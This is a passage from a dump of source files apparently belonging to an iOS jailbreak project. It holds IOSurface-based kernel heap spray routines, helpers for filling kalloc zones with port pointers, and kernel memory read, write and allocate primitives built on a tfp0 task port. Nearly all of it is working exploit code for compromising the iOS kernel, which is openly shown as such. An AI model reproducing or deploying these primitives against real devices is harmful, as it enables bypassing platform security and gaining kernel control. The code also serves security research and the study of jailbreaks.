| free(body); 150 | } 151 | 152 | mach_vm_size_t pagesize = 0; 153 | 154 | const uint64_t IOSURFACE_CREATE_SURFACE = 0; 155 | const uint64_t IOSURFACE_SET_VALUE = 9; 156 | const uint64_t IOSURFACE_GET_VALUE = 10; 157 | const uint64_t IOSURFACE_DELETE_VALUE = 11; 158 | 159 | int init_IOSurface() { 160 | kern_return_t ret = KERN_SUCCESS; 161 | 162 | ret = _host_page_size(mach_host_self(), (vm_size_t*)&pagesize); 163 | printf("[i] page size: 0x%llx, %s\n", pagesize, mach_error_string(ret)); 164 | if (ret != KERN_SUCCESS) { 165 | printf("[-] failed to get page size! ret: %x %s\n", ret, mach_error_string(ret)); 166 | return ret; 167 | } 168 | return !IOSurface_init(); 169 | } 170 | 171 | void deinit_IOSurface() { 172 | IOSurface_deinit(); 173 | } 174 | 175 | int spray_IOSurface(void *data, size_t size) { 176 | return !IOSurface_spray_with_gc(32, 256, data, (uint32_t)size, NULL); 177 | } 178 | -------------------------------------------------------------------------------- /Athenus/exploit_utilities.h: -------------------------------------------------------------------------------- 1 | // 2 | // exploit_utilities.h 3 | // sock_port 4 | // 5 | // Created by Jake James on 7/17/19. 6 | // Copyright © 2019 Jake James. All rights reserved. 7 | // 8 | 9 | #ifndef exploit_utilities_h 10 | #define exploit_utilities_h 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | struct ool_msg { 22 | mach_msg_header_t hdr; 23 | mach_msg_body_t body; 24 | mach_msg_ool_ports_descriptor_t ool_ports; 25 | }; 26 | 27 | struct simple_msg { 28 | mach_msg_header_t hdr; 29 | char buf[0]; 30 | }; 31 | 32 | size_t message_size_for_kalloc_size(size_t kalloc_size); 33 | mach_port_t fill_kalloc_with_port_pointer(mach_port_t target_port, int count, int disposition); 34 | mach_port_t send_kalloc_message(uint8_t *replacer_message_body, uint32_t replacer_body_size); 35 | void trigger_gc(void); 36 | 37 | enum { 38 | kIOCFSerializeToBinary = 0x00000001U, 39 | }; 40 | 41 | #define kOSSerializeBinarySignature 0x000000D3U 42 | 43 | enum { 44 | kOSSerializeDictionary = 0x01000000U, 45 | kOSSerializeArray = 0x02000000U, 46 | kOSSerializeSet = 0x03000000U, 47 | kOSSerializeNumber = 0x04000000U, 48 | kOSSerializeSymbol = 0x08000000U, 49 | kOSSerializeString = 0x09000000U, 50 | kOSSerializeData = 0x0a000000U, 51 | kOSSerializeBoolean = 0x0b000000U, 52 | kOSSerializeObject = 0x0c000000U, 53 | 54 | kOSSerializeTypeMask = 0x7F000000U, 55 | kOSSerializeDataMask = 0x00FFFFFFU, 56 | 57 | kOSSerializeEndCollection = 0x80000000U, 58 | 59 | kOSSerializeMagic = 0x000000d3U, 60 | }; 61 | 62 | extern mach_vm_size_t pagesize; 63 | 64 | extern const uint64_t IOSURFACE_CREATE_SURFACE; 65 | extern const uint64_t IOSURFACE_SET_VALUE; 66 | extern const uint64_t IOSURFACE_GET_VALUE; 67 | extern const uint64_t IOSURFACE_DELETE_VALUE; 68 | 69 | int init_IOSurface(void); 70 | void deinit_IOSurface(void); 71 | int spray_IOSurface(void *data, size_t size); 72 | 73 | #endif /* exploit_utilities_h */ 74 | -------------------------------------------------------------------------------- /Athenus/fuckyou.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/fuckyou.png -------------------------------------------------------------------------------- /Athenus/iosurface.c: -------------------------------------------------------------------------------- 1 | /* 2 | * iosurface.c 3 | * Brandon Azad 4 | */ 5 | #define IOSURFACE_EXTERN 6 | #include "iosurface.h" 7 | 8 | // ---- Global variables -------------------------------------------------------------------------- 9 | 10 | // Is the IOSurface subsystem initialized? 11 | static bool IOSurface_initialized; 12 | 13 | // ---- Functions --------------------------------------------------------------------------------- 14 | 15 | #define ERROR(str, ...) printf("[-] "str, ##__VA_ARGS__) 16 | bool 17 | IOSurface_init() { 18 | if (IOSurface_initialized) { 19 | return true; 20 | } 21 | IOSurfaceRoot = IOServiceGetMatchingService( 22 | kIOMasterPortDefault, 23 | IOServiceMatching("IOSurfaceRoot")); 24 | if (IOSurfaceRoot == MACH_PORT_NULL) { 25 | ERROR("could not find %s", "IOSurfaceRoot"); 26 | return false; 27 | } 28 | kern_return_t kr = IOServiceOpen( 29 | IOSurfaceRoot, 30 | mach_task_self(), 31 | 0, 32 | &IOSurfaceRootUserClient); 33 | if (kr != KERN_SUCCESS) { 34 | ERROR("could not open %s", "IOSurfaceRootUserClient"); 35 | return false; 36 | } 37 | struct _IOSurfaceFastCreateArgs create_args = { .alloc_size = 0x4000, }; 38 | struct IOSurfaceLockResult lock_result; 39 | 40 | extern uint32_t create_outsize; 41 | size_t lock_result_size = create_outsize; 42 | kr = IOConnectCallMethod( 43 | IOSurfaceRootUserClient, 44 | 6, // create_surface_client_fast_path 45 | NULL, 0, 46 | &create_args, sizeof(create_args), 47 | NULL, NULL, 48 | &lock_result, &lock_result_size); 49 | if (kr != KERN_SUCCESS) { 50 | ERROR("could not create %s: 0x%x", "IOSurfaceClient", kr); 51 | return false; 52 | } 53 | IOSurface_id = lock_result.surface_id; 54 | if (!IOSurface_id) { 55 | IOSurface_id = (uint32_t)lock_result.addr3; 56 | } 57 | IOSurface_initialized = true; 58 | return true; 59 | } 60 | 61 | void 62 | IOSurface_deinit() { 63 | assert(IOSurface_initialized); 64 | IOSurface_initialized = false; 65 | IOSurface_id = 0; 66 | IOServiceClose(IOSurfaceRootUserClient); 67 | IOObjectRelease(IOSurfaceRoot); 68 | } 69 | 70 | /* 71 | * IOSurface_set_value 72 | * 73 | * Description: 74 | * A wrapper around IOSurfaceRootUserClient::set_value(). 75 | */ 76 | bool 77 | IOSurface_set_value(const struct IOSurfaceValueArgs *args, size_t args_size) { 78 | struct IOSurfaceValueResultArgs result; 79 | size_t result_size = sizeof(result); 80 | kern_return_t kr = IOConnectCallMethod( 81 | IOSurfaceRootUserClient, 82 | 9, // set_value 83 | NULL, 0, 84 | args, args_size, 85 | NULL, NULL, 86 | &result, &result_size); 87 | if (kr != KERN_SUCCESS) { 88 | ERROR("failed to %s value in %s: 0x%x", "set", "IOSurface", kr); 89 | return false; 90 | } 91 | return true; 92 | } 93 | 94 | /* 95 | * IOSurface_get_value 96 | * 97 | * Description: 98 | * A wrapper around IOSurfaceRootUserClient::get_value(). 99 | */ 100 | static bool 101 | IOSurface_get_value(const struct IOSurfaceValueArgs *in, size_t in_size, 102 | struct IOSurfaceValueArgs *out, size_t *out_size) { 103 | kern_return_t kr = IOConnectCallMethod( 104 | IOSurfaceRootUserClient, 105 | 10, // get_value 106 | NULL, 0, 107 | in, in_size, 108 | NULL, NULL, 109 | out, out_size); 110 | if (kr != KERN_SUCCESS) { 111 | ERROR("failed to %s value in %s: 0x%x", "get", "IOSurface", kr); 112 | return false; 113 | } 114 | return true; 115 | } 116 | 117 | /* 118 | * IOSurface_remove_value 119 | * 120 | * Description: 121 | * A wrapper around IOSurfaceRootUserClient::remove_value(). 122 | */ 123 | static bool 124 | IOSurface_remove_value(const struct IOSurfaceValueArgs *args, size_t args_size) { 125 | struct IOSurfaceValueResultArgs result; 126 | size_t result_size = sizeof(result); 127 | kern_return_t kr = IOConnectCallMethod( 128 | IOSurfaceRootUserClient, 129 | 11, // remove_value 130 | NULL, 0, 131 | args, args_size, 132 | NULL, NULL, 133 | &result, &result_size); 134 | if (kr != KERN_SUCCESS) { 135 | ERROR("failed to %s value in %s: 0x%x", "remove", "IOSurface", kr); 136 | return false; 137 | } 138 | return true; 139 | } 140 | 141 | /* 142 | * base255_encode 143 | * 144 | * Description: 145 | * Encode an integer so that it does not contain any null bytes. 146 | */ 147 | static uint32_t 148 | base255_encode(uint32_t value) { 149 | uint32_t encoded = 0; 150 | for (unsigned i = 0; i < sizeof(value); i++) { 151 | encoded |= ((value % 255) + 1) << (8 * i); 152 | value /= 255; 153 | } 154 | return encoded; 155 | } 156 | 157 | /* 158 | * xml_units_for_data_size 159 | * 160 | * Description: 161 | * Return the number of XML units needed to store the given size of data in an OSString. 162 | */ 163 | static size_t 164 | xml_units_for_data_size(size_t data_size) { 165 | return ((data_size - 1) + sizeof(uint32_t) - 1) / sizeof(uint32_t); 166 | } 167 | 168 | /* 169 | * serialize_IOSurface_data_array 170 | * 171 | * Description: 172 | * Create the template of the serialized array to pass to IOSurfaceUserClient::set_value(). 173 | * Returns the size of the serialized data in bytes. 174 | */ 175 | static size_t 176 | serialize_IOSurface_data_array(uint32_t *xml0, uint32_t array_length, uint32_t data_size, 177 | uint32_t **xml_data, uint32_t **key) { 178 | uint32_t *xml = xml0; 179 | *xml++ = kOSSerializeBinarySignature; 180 | *xml++ = kOSSerializeArray | 2 | kOSSerializeEndCollection; 181 | *xml++ = kOSSerializeArray | array_length; 182 | for (size_t i = 0; i < array_length; i++) { 183 | uint32_t flags = (i == array_length - 1 ? kOSSerializeEndCollection : 0); 184 | *xml++ = kOSSerializeData | (data_size - 1) | flags; 185 | xml_data[i] = xml; 186 | xml += xml_units_for_data_size(data_size); 187 | } 188 | *xml++ = kOSSerializeSymbol | sizeof(uint32_t) + 1 | kOSSerializeEndCollection; 189 | *key = xml++; // This will be filled in on each array loop. 190 | *xml++ = 0; // Null-terminate the symbol. 191 | return (xml - xml0) * sizeof(*xml); 192 | } 193 | 194 | /* 195 | * IOSurface_spray_with_gc_internal 196 | * 197 | * Description: 198 | * A generalized version of IOSurface_spray_with_gc() and IOSurface_spray_size_with_gc(). 199 | */ 200 | 201 | static uint32_t total_arrays = 0; 202 | static bool 203 | IOSurface_spray_with_gc_internal(uint32_t array_count, uint32_t array_length, uint32_t extra_count, 204 | void *data, uint32_t data_size, 205 | void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size)) { 206 | assert(array_count <= 0xffffff); 207 | assert(array_length <= 0xffff); 208 | assert(data_size <= 0xffffff); 209 | assert(extra_count < array_count); 210 | // Make sure our IOSurface is initialized. 211 | bool ok = IOSurface_init(); 212 | if (!ok) { 213 | return 0; 214 | } 215 | // How big will our OSUnserializeBinary dictionary be? 216 | uint32_t current_array_length = array_length + (extra_count > 0 ? 1 : 0); 217 | size_t xml_units_per_data = xml_units_for_data_size(data_size); 218 | size_t xml_units = 1 + 1 + 1 + (1 + xml_units_per_data) * current_array_length + 1 + 1 + 1; 219 | // Allocate the args struct. 220 | struct IOSurfaceValueArgs *args; 221 | size_t args_size = sizeof(*args) + xml_units * sizeof(args->xml[0]); 222 | args = malloc(args_size); 223 | assert(args != 0); 224 | // Build the IOSurfaceValueArgs. 225 | args->surface_id = IOSurface_id; 226 | // Create the serialized OSArray. We'll remember the locations we need to fill in with our 227 | // data as well as the slot we need to set our key. 228 | uint32_t **xml_data = malloc(current_array_length * sizeof(*xml_data)); 229 | assert(xml_data != NULL); 230 | uint32_t *key; 231 | size_t xml_size = serialize_IOSurface_data_array(args->xml, 232 | current_array_length, data_size, xml_data, &key); 233 | assert(xml_size == xml_units * sizeof(args->xml[0])); 234 | // Keep track of when we need to do GC. 235 | size_t sprayed = 0; 236 | size_t next_gc_step = 0; 237 | // Loop through the arrays. 238 | for (uint32_t array_id = 0; array_id < array_count; array_id++) { 239 | // If we've crossed the GC sleep boundary, sleep for a bit and schedule the 240 | // next one. 241 | // Now build the array and its elements. 242 | *key = base255_encode(total_arrays + array_id); 243 | for (uint32_t data_id = 0; data_id < current_array_length; data_id++) { 244 | // Update the data for this spray if the user requested. 245 | if (callback != NULL) { 246 | callback(array_id, data_id, data, data_size); 247 | } 248 | // Copy in the data to the appropriate slot. 249 | memcpy(xml_data[data_id], data, data_size - 1); 250 | } 251 | // Finally set the array in the surface. 252 | ok = IOSurface_set_value(args, args_size); 253 | if (!ok) { 254 | free(args); 255 | free(xml_data); 256 | return false; 257 | } 258 | if (ok) { 259 | sprayed += data_size * current_array_length; 260 | // If we just sprayed an array with an extra element, decrement the 261 | // outstanding extra_count. 262 | if (current_array_length > array_length) { 263 | assert(extra_count > 0); 264 | extra_count--; 265 | // If our extra_count is now 0, rebuild our serialized array. (We 266 | // could implement this as a memmove(), but I'm lazy.) 267 | if (extra_count == 0) { 268 | current_array_length--; 269 | serialize_IOSurface_data_array(args->xml, 270 | current_array_length, data_size, 271 | xml_data, &key); 272 | } 273 | } 274 | } 275 | } 276 | if (next_gc_step > 0) { 277 | // printf("\n"); 278 | } 279 | // Clean up resources. 280 | free(args); 281 | free(xml_data); 282 | total_arrays += array_count; 283 | return true; 284 | } 285 | 286 | bool 287 | IOSurface_spray_with_gc(uint32_t array_count, uint32_t array_length, 288 | void *data, uint32_t data_size, 289 | void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size)) { 290 | return IOSurface_spray_with_gc_internal(array_count, array_length, 0, 291 | data, data_size, callback); 292 | } 293 | 294 | bool 295 | IOSurface_spray_size_with_gc(uint32_t array_count, size_t spray_size, 296 | void *data, uint32_t data_size, 297 | void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size)) { 298 | assert(array_count <= 0xffffff); 299 | assert(data_size <= 0xffffff); 300 | size_t data_count = (spray_size + data_size - 1) / data_size; 301 | size_t array_length = data_count / array_count; 302 | size_t extra_count = data_count % array_count; 303 | assert(array_length <= 0xffff); 304 | return IOSurface_spray_with_gc_internal(array_count, (uint32_t) array_length, 305 | (uint32_t) extra_count, data, data_size, callback); 306 | } 307 | 308 | bool 309 | IOSurface_spray_read_array(uint32_t array_id, uint32_t array_length, uint32_t data_size, 310 | void (^callback)(uint32_t data_id, void *data, size_t size)) { 311 | assert(IOSurface_initialized); 312 | assert(array_id < 0xffffff); 313 | assert(array_length <= 0xffff); 314 | assert(data_size <= 0xffffff); 315 | bool success = false; 316 | // Create the input args. 317 | struct IOSurfaceValueArgs_string args_in = {}; 318 | args_in.surface_id = IOSurface_id; 319 | args_in.string_data = base255_encode(array_id); 320 | // Create the output args. 321 | size_t xml_units_per_data = xml_units_for_data_size(data_size); 322 | size_t xml_units = 1 + 1 + (1 + xml_units_per_data) * array_length; 323 | struct IOSurfaceValueArgs *args_out; 324 | size_t args_out_size = sizeof(*args_out) + xml_units * sizeof(args_out->xml[0]); 325 | // Over-allocate the output buffer a little bit. This allows us to directly pass the inline 326 | // data to the client without having to worry about the fact that the kernel data is 1 byte 327 | // shorter (which otherwise would produce an out-of-bounds read on the last element for 328 | // certain data sizes). Yeah, it's a hack, deal with it. 329 | args_out = malloc(args_out_size + sizeof(uint32_t)); 330 | assert(args_out != 0); 331 | // Get the value. 332 | bool ok = IOSurface_get_value((struct IOSurfaceValueArgs *)&args_in, sizeof(args_in), 333 | args_out, &args_out_size); 334 | if (!ok) { 335 | goto fail; 336 | } 337 | // Do the ugly parsing ourselves. :( 338 | uint32_t *xml = args_out->xml; 339 | if (*xml++ != kOSSerializeBinarySignature) { 340 | ERROR("did not find OSSerializeBinary signature"); 341 | goto fail; 342 | } 343 | if (*xml++ != (kOSSerializeArray | array_length | kOSSerializeEndCollection)) { 344 | ERROR("unexpected container"); 345 | goto fail; 346 | } 347 | for (uint32_t data_id = 0; data_id < array_length; data_id++) { 348 | uint32_t flags = (data_id == array_length - 1 ? kOSSerializeEndCollection : 0); 349 | if (*xml++ != (kOSSerializeString | data_size - 1 | flags)) { 350 | ERROR("unexpected data: 0x%x != 0x%x at index %u", 351 | xml[-1], kOSSerializeString | data_size - 1 | flags, 352 | data_id); 353 | goto fail; 354 | } 355 | callback(data_id, (void *)xml, data_size); 356 | xml += xml_units_per_data; 357 | } 358 | success = true; 359 | fail: 360 | free(args_out); 361 | return success; 362 | } 363 | 364 | bool 365 | IOSurface_spray_read_all_data(uint32_t array_count, uint32_t array_length, uint32_t data_size, 366 | void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size)) { 367 | assert(IOSurface_initialized); 368 | assert(array_count <= 0xffffff); 369 | assert(array_length <= 0xffff); 370 | assert(data_size <= 0xffffff); 371 | bool ok = true; 372 | //TODO: We should probably amortize the creation of the output buffer. 373 | for (uint32_t array_id = 0; array_id < array_count; array_id++) { 374 | ok &= IOSurface_spray_read_array(array_id, array_length, data_size, 375 | ^(uint32_t data_id, void *data, size_t size) { 376 | callback(array_id, data_id, data, size); 377 | }); 378 | } 379 | return ok; 380 | } 381 | 382 | bool 383 | IOSurface_spray_remove_array(uint32_t array_id) { 384 | assert(IOSurface_initialized); 385 | assert(array_id < 0xffffff); 386 | struct IOSurfaceValueArgs_string args = {}; 387 | args.surface_id = IOSurface_id; 388 | args.string_data = base255_encode(array_id); 389 | return IOSurface_remove_value((struct IOSurfaceValueArgs *)&args, sizeof(args)); 390 | } 391 | 392 | bool 393 | IOSurface_spray_clear(uint32_t array_count) { 394 | assert(IOSurface_initialized); 395 | assert(array_count <= 0xffffff); 396 | bool ok = true; 397 | for (uint32_t array_id = 0; array_id < array_count; array_id++) { 398 | ok &= IOSurface_spray_remove_array(array_id); 399 | } 400 | return ok; 401 | } 402 | -------------------------------------------------------------------------------- /Athenus/iosurface.h: -------------------------------------------------------------------------------- 1 | /* 2 | * iosurface.h 3 | * Brandon Azad 4 | */ 5 | #ifndef VOUCHER_SWAP__IOSURFACE_H_ 6 | #define VOUCHER_SWAP__IOSURFACE_H_ 7 | 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | 16 | #include "exploit_utilities.h" 17 | 18 | #ifdef IOSURFACE_EXTERN 19 | #define extern IOSURFACE_EXTERN 20 | #endif 21 | 22 | // The IOSurfaceRoot service. 23 | extern mach_port_t IOSurfaceRoot; 24 | 25 | // An IOSurfaceRootUserClient instance. 26 | extern mach_port_t IOSurfaceRootUserClient; 27 | 28 | // The ID of the IOSurface we're using. 29 | extern uint32_t IOSurface_id; 30 | 31 | /* 32 | * IOSurface_init 33 | * 34 | * Description: 35 | * Initialize the IOSurface subsystem. 36 | */ 37 | bool IOSurface_init(void); 38 | 39 | /* 40 | * IOSurface_deinit 41 | * 42 | * Description: 43 | * Tear down the IOSurface subsystem. Any sprayed memory will be automatically deallocated. 44 | */ 45 | void IOSurface_deinit(void); 46 | 47 | /* 48 | * IOSurface_spray_with_gc 49 | * 50 | * Description: 51 | * Spray kernel memory using IOSurface properties. 52 | * 53 | * The current implementation stores each data allocation in an OSString. The reason for this 54 | * is that OSString contents will be allocated using kalloc() even for allocations larger than 55 | * the page size. OSData on the other hand will use kmem_alloc() for large allocations. 56 | * Consequently, the last byte of data will be zeroed out to create a null terminator. 57 | */ 58 | bool IOSurface_spray_with_gc(uint32_t array_count, uint32_t array_length, 59 | void *data, uint32_t data_size, 60 | void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size)); 61 | 62 | /* 63 | * IOSurface_spray_size_with_gc 64 | * 65 | * Description: 66 | * Spray kernel memory using IOSurface properties. 67 | * 68 | * This function computes the number of elements per array automatically. 69 | */ 70 | bool IOSurface_spray_size_with_gc(uint32_t array_count, size_t spray_size, 71 | void *data, uint32_t data_size, 72 | void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size)); 73 | 74 | /* 75 | * IOSurface_spray_read_array 76 | * 77 | * Description: 78 | * Read back the data elements in a particular array in a particular IOSurface spray. 79 | */ 80 | bool IOSurface_spray_read_array(uint32_t array_id, uint32_t array_length, uint32_t data_size, 81 | void (^callback)(uint32_t data_id, void *data, size_t size)); 82 | 83 | /* 84 | * IOSurface_spray_read_all_data 85 | * 86 | * Description: 87 | * Read back all the data elements in an IOSurface spray. 88 | */ 89 | bool IOSurface_spray_read_all_data(uint32_t array_count, uint32_t array_length, uint32_t data_size, 90 | void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size)); 91 | 92 | /* 93 | * IOSurface_spray_remove_array 94 | * 95 | * Description: 96 | * Remove a particular array from an IOSurface spray, freeing the contained data elements. 97 | */ 98 | bool IOSurface_spray_remove_array(uint32_t array_id); 99 | 100 | /* 101 | * IOSurface_spray_clear 102 | * 103 | * Description: 104 | * Remove all the arrays from an IOSurface spray, freeing all the data elements. 105 | */ 106 | bool IOSurface_spray_clear(uint32_t array_count); 107 | 108 | // ---- IOSurface types --------------------------------------------------------------------------- 109 | 110 | struct _IOSurfaceFastCreateArgs { 111 | uint64_t address; 112 | uint32_t width; 113 | uint32_t height; 114 | uint32_t pixel_format; 115 | uint32_t bytes_per_element; 116 | uint32_t bytes_per_row; 117 | uint32_t alloc_size; 118 | }; 119 | 120 | struct IOSurfaceLockResult { 121 | uint64_t addr1; 122 | uint64_t addr2; 123 | uint64_t addr3; 124 | uint32_t surface_id; 125 | uint8_t _pad2[0xdd0-0x18-0x4]; 126 | }; 127 | 128 | #if !__cplusplus 129 | struct IOSurfaceValueArgs { 130 | uint32_t surface_id; 131 | uint32_t _out1; 132 | union { 133 | uint32_t xml[0]; 134 | char string[0]; 135 | }; 136 | }; 137 | #endif 138 | 139 | struct IOSurfaceValueArgs_string { 140 | uint32_t surface_id; 141 | uint32_t _out1; 142 | uint32_t string_data; 143 | char null; 144 | }; 145 | 146 | struct IOSurfaceValueResultArgs { 147 | uint32_t out; 148 | }; 149 | 150 | 151 | bool IOSurface_set_value(const struct IOSurfaceValueArgs *args, size_t args_size); 152 | 153 | #undef extern 154 | 155 | #endif 156 | -------------------------------------------------------------------------------- /Athenus/jailbreak.h: -------------------------------------------------------------------------------- 1 | // 2 | // jailbreak.h 3 | // doubleH3lix 4 | // 5 | // Created by tihmstar on 18.02.18. 6 | // Copyright © 2018 tihmstar. All rights reserved. 7 | // 8 | 9 | #ifndef jailbreak_h 10 | #define jailbreak_h 11 | 12 | #include 13 | 14 | extern dispatch_queue_t jailbreak_queue; 15 | 16 | int jailbreak(void); 17 | 18 | int jailbreak_system(const char *command); 19 | 20 | #endif /* jailbreak_h */ 21 | -------------------------------------------------------------------------------- /Athenus/jbresources/Cydia-10.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/jbresources/Cydia-10.tar -------------------------------------------------------------------------------- /Athenus/jbresources/launchctl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/jbresources/launchctl -------------------------------------------------------------------------------- /Athenus/jbresources/python.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/jbresources/python.tar -------------------------------------------------------------------------------- /Athenus/jbresources/tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/jbresources/tar -------------------------------------------------------------------------------- /Athenus/kernel_memory.c: -------------------------------------------------------------------------------- 1 | // 2 | // kernel_memory.c 3 | // sock_port 4 | // 5 | // Created by Jake James on 7/18/19. 6 | // Copyright © 2019 Jake James. All rights reserved. 7 | // 8 | 9 | #include "kernel_memory.h" 10 | #include 11 | #include "offsets.h" 12 | 13 | extern mach_port_t tfp0; 14 | 15 | void init_kernel_memory(mach_port_t _tfp0) { 16 | tfp0 = _tfp0; 17 | } 18 | 19 | kptr_t kalloc(vm_size_t size) { 20 | return kmem_alloc(size); 21 | } 22 | 23 | void kfree(mach_vm_address_t address, vm_size_t size) { 24 | kmem_free((kptr_t)address, size); 25 | } 26 | 27 | size_t kread(kptr_t where, void *p, size_t size) { 28 | int rv; 29 | size_t offset = 0; 30 | while (offset < size) { 31 | mach_vm_size_t sz, chunk = 2048; 32 | if (chunk > size - offset) { 33 | chunk = size - offset; 34 | } 35 | rv = mach_vm_read_overwrite(tfp0, where + offset, chunk, (mach_vm_address_t)p + offset, &sz); 36 | if (rv || sz == 0) { 37 | printf("[-] error on kread("ADDR")\n", where); 38 | break; 39 | } 40 | offset += sz; 41 | } 42 | return offset; 43 | } 44 | 45 | size_t kwrite(kptr_t where, const void *p, size_t size) { 46 | int rv; 47 | size_t offset = 0; 48 | while (offset < size) { 49 | size_t chunk = 2048; 50 | if (chunk > size - offset) { 51 | chunk = size - offset; 52 | } 53 | rv = mach_vm_write(tfp0, where + offset, (vm_offset_t)p + offset, (int)chunk); 54 | if (rv) { 55 | printf("[-] error on kwrite("ADDR")\n", where); 56 | break; 57 | } 58 | offset += chunk; 59 | } 60 | return offset; 61 | } 62 | 63 | uintptr_t 64 | find_port(mach_port_name_t port, kptr_t task_self) { 65 | uintptr_t task_addr = rkptr(task_self + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 66 | uintptr_t itk_space = rkptr(task_addr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE)); 67 | uintptr_t is_table = rkptr(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE)); 68 | 69 | uint32_t port_index = port >> 8; 70 | const int sizeof_ipc_entry_t = koffset(KSTRUCT_SIZE_IPC_ENTRY); 71 | 72 | uintptr_t port_addr = rkptr(is_table + (port_index * sizeof_ipc_entry_t)); 73 | 74 | return port_addr; 75 | } 76 | 77 | uint64_t kread_uint64(kptr_t where){ 78 | uint64_t value = 0; 79 | size_t sz = kread(where, &value, sizeof(value)); 80 | return (sz == sizeof(value)) ? value : 0; 81 | } 82 | 83 | uint32_t kread_uint32(kptr_t where){ 84 | uint32_t value = 0; 85 | size_t sz = kread(where, &value, sizeof(value)); 86 | return (sz == sizeof(value)) ? value : 0; 87 | } 88 | 89 | uintptr_t kread_uintptr(kptr_t where){ 90 | uintptr_t value = 0; 91 | size_t sz = kread(where, &value, sizeof(value)); 92 | return (sz == sizeof(value)) ? value : 0; 93 | } 94 | 95 | size_t kwrite_uint64(kptr_t where, uint64_t value){ 96 | return kwrite(where, &value, sizeof(value)); 97 | } 98 | 99 | size_t kwrite_uint32(kptr_t where, uint32_t value){ 100 | return kwrite(where, &value, sizeof(value)); 101 | } 102 | 103 | size_t kwrite_uintptr(kptr_t where, uintptr_t value) { 104 | return kwrite(where, &value, sizeof(value)); 105 | } 106 | 107 | kptr_t kmem_alloc(uint64_t size) { 108 | if (!MACH_PORT_VALID(tfp0)) { 109 | printf("attempt to allocate kernel memory before any kernel memory write primitives available"); 110 | return 0; 111 | } 112 | 113 | kern_return_t err; 114 | mach_vm_address_t addr = 0; 115 | mach_vm_size_t ksize = round_page_kernel(size); 116 | err = mach_vm_allocate(tfp0, &addr, ksize, VM_FLAGS_ANYWHERE); 117 | if (err != KERN_SUCCESS) { 118 | printf("unable to allocate kernel memory via tfp0: %s %x", mach_error_string(err), err); 119 | return 0; 120 | } 121 | 122 | return (kptr_t)addr; 123 | } 124 | 125 | bool 126 | kmem_free(mach_vm_address_t kaddr, vm_size_t size) { 127 | if (!MACH_PORT_VALID(tfp0)) { 128 | printf("attempt to deallocate kernel memory before any kernel memory write primitives available"); 129 | return false; 130 | } 131 | 132 | kern_return_t err; 133 | mach_vm_size_t ksize = round_page_kernel(size); 134 | err = mach_vm_deallocate(tfp0, kaddr, ksize); 135 | if (err != KERN_SUCCESS) { 136 | printf("unable to deallocate kernel memory via tfp0: %s %x", mach_error_string(err), err); 137 | return false; 138 | } 139 | 140 | return true; 141 | } 142 | 143 | bool rkbuffer(kptr_t kaddr, void* buffer, size_t length) { 144 | if (!MACH_PORT_VALID(tfp0)) { 145 | printf("attempt to read kernel memory but no kernel memory read primitives available"); 146 | return 0; 147 | } 148 | 149 | return (kread(kaddr, buffer, length) == length); 150 | } 151 | 152 | bool wkbuffer(kptr_t kaddr, void* buffer, size_t length) { 153 | if (!MACH_PORT_VALID(tfp0)) { 154 | printf("attempt to write to kernel memory before any kernel memory write primitives available"); 155 | return false; 156 | } 157 | 158 | return (kwrite(kaddr, buffer, length) == length); 159 | } 160 | -------------------------------------------------------------------------------- /Athenus/kernel_memory.h: -------------------------------------------------------------------------------- 1 | // 2 | // kernel_memory.h 3 | // sock_port 4 | // 5 | // Created by Jake James on 7/18/19. 6 | // Copyright © 2019 Jake James. All rights reserved. 7 | // 8 | 9 | #ifndef kernel_memory_h 10 | #define kernel_memory_h 11 | 12 | #include 13 | #include 14 | #include "common.h" 15 | #include 16 | 17 | __BEGIN_DECLS 18 | 19 | kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags); 20 | kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize); 21 | kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt); 22 | kern_return_t mach_vm_deallocate(vm_map_t target, mach_vm_address_t address, mach_vm_size_t size);; 23 | kern_return_t mach_vm_read(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, vm_offset_t *data, mach_msg_type_number_t *dataCnt); 24 | kern_return_t mach_vm_protect(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection); 25 | 26 | void init_kernel_memory(mach_port_t tfp0); 27 | 28 | size_t kread(kptr_t where, void *p, size_t size); 29 | 30 | #define rk32(where) kread_uint32(where) 31 | #define rk64(where) kread_uint64(where) 32 | #define rkptr(where) kread_uintptr(where) 33 | 34 | size_t kwrite(kptr_t where, const void *p, size_t size); 35 | uint64_t kread_uint64(kptr_t where); 36 | uint32_t kread_uint32(kptr_t where); 37 | uintptr_t kread_uintptr(kptr_t where); 38 | size_t kwrite_uint64(kptr_t where, uint64_t value); 39 | size_t kwrite_uint32(kptr_t where, uint32_t value); 40 | size_t kwrite_uintptr(kptr_t where, uintptr_t value); 41 | 42 | void wk32(kptr_t where, uint32_t what); 43 | void wk64(kptr_t where, 